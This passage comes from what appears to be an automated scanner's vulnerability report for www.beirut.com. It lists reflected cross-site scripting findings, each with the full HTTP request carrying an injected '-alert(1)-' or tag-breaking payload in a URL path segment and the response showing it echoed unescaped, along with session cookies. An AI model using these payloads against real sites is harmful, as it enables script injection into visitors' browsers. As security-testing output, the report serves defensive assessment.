Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5885f'-alert(1)-'687637bb642 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet5885f'-alert(1)-'687637bb642/Blogs HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:48:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60337

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Online-Internet5885f'-alert(1)-'687637bb642/Blogs';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.603. http://www.beirut.com/Online-Internet/Blogs [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Blogs

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59d6a'-alert(1)-'3b34277816 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet/Blogs59d6a'-alert(1)-'3b34277816 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:54:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58032

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Online-Internet/Blogs59d6a'-alert(1)-'3b34277816';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.604. http://www.beirut.com/Online-Internet/Business/56859781 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Business/56859781

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1eefc'-alert(1)-'7e00d9a754f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet1eefc'-alert(1)-'7e00d9a754f/Business/56859781 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:46:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60240

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Online-Internet1eefc'-alert(1)-'7e00d9a754f/Business';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.605. http://www.beirut.com/Online-Internet/Business/56859781 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Online-Internet/Business/56859781

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a97d"><a>23f65bdada9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internet7a97d"><a>23f65bdada9/Business/56859781 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:36:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internet7a97d"><a>23f65bdada9">
...[SNIP]...

4.606. http://www.beirut.com/Online-Internet/Business/56859781 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Business/56859781

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24096'-alert(1)-'6f3d30ecf5a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet/Business24096'-alert(1)-'6f3d30ecf5a/56859781 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:49:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56309

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Online-Internet/Business24096'-alert(1)-'6f3d30ecf5a';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.607. http://www.beirut.com/Online-Internet/Classifieds/395527905 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Classifieds/395527905

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8728'-alert(1)-'b470d472cc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internetc8728'-alert(1)-'b470d472cc4/Classifieds/395527905 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:16:35 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Online-Internetc8728'-alert(1)-'b470d472cc4/Classifieds';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.608. http://www.beirut.com/Online-Internet/Classifieds/395527905 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Online-Internet/Classifieds/395527905

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdd5c"><a>47dd424aae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internetfdd5c"><a>47dd424aae/Classifieds/395527905 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:06:52 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internetfdd5c"><a>47dd424aae">
...[SNIP]...

4.609. http://www.beirut.com/Online-Internet/Classifieds/395527905 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Classifieds/395527905

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba3b3'-alert(1)-'bf2f86fcc9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet/Classifiedsba3b3'-alert(1)-'bf2f86fcc9e/395527905 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:23:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57119

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Online-Internet/Classifiedsba3b3'-alert(1)-'bf2f86fcc9e';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.610. http://www.beirut.com/Online-Internet/Design-services/3885810200 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Online-Internet/Design-services/3885810200

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8150"><a>69b08593017 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internetd8150"><a>69b08593017/Design-services/3885810200 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:04:43 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internetd8150"><a>69b08593017">
...[SNIP]...

4.611. http://www.beirut.com/Online-Internet/Design-services/3885810200 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Design-services/3885810200

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb975'-alert(1)-'d4cd8a40ede was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internetbb975'-alert(1)-'d4cd8a40ede/Design-services/3885810200 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:17:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60292

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Online-Internetbb975'-alert(1)-'d4cd8a40ede/Design-services';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.612. http://www.beirut.com/Online-Internet/Design-services/3885810200 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Design-services/3885810200

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5d2f'-alert(1)-'870f198d5f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet/Design-servicesb5d2f'-alert(1)-'870f198d5f/3885810200 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:21:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Online-Internet/Design-servicesb5d2f'-alert(1)-'870f198d5f';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.613. http://www.beirut.com/Online-Internet/Directories/0054751592 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Online-Internet/Directories/0054751592

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e02fd"><a>485acc119c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internete02fd"><a>485acc119c2/Directories/0054751592 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:10:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internete02fd"><a>485acc119c2">
...[SNIP]...

4.614. http://www.beirut.com/Online-Internet/Directories/0054751592 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Directories/0054751592

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5f85'-alert(1)-'f85890f381b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Interneta5f85'-alert(1)-'f85890f381b/Directories/0054751592 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:20:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Online-Interneta5f85'-alert(1)-'f85890f381b/Directories';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.615. http://www.beirut.com/Online-Internet/Directories/0054751592 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Directories/0054751592

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 231fc'-alert(1)-'973dc70caef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet/Directories231fc'-alert(1)-'973dc70caef/0054751592 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:23:26 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
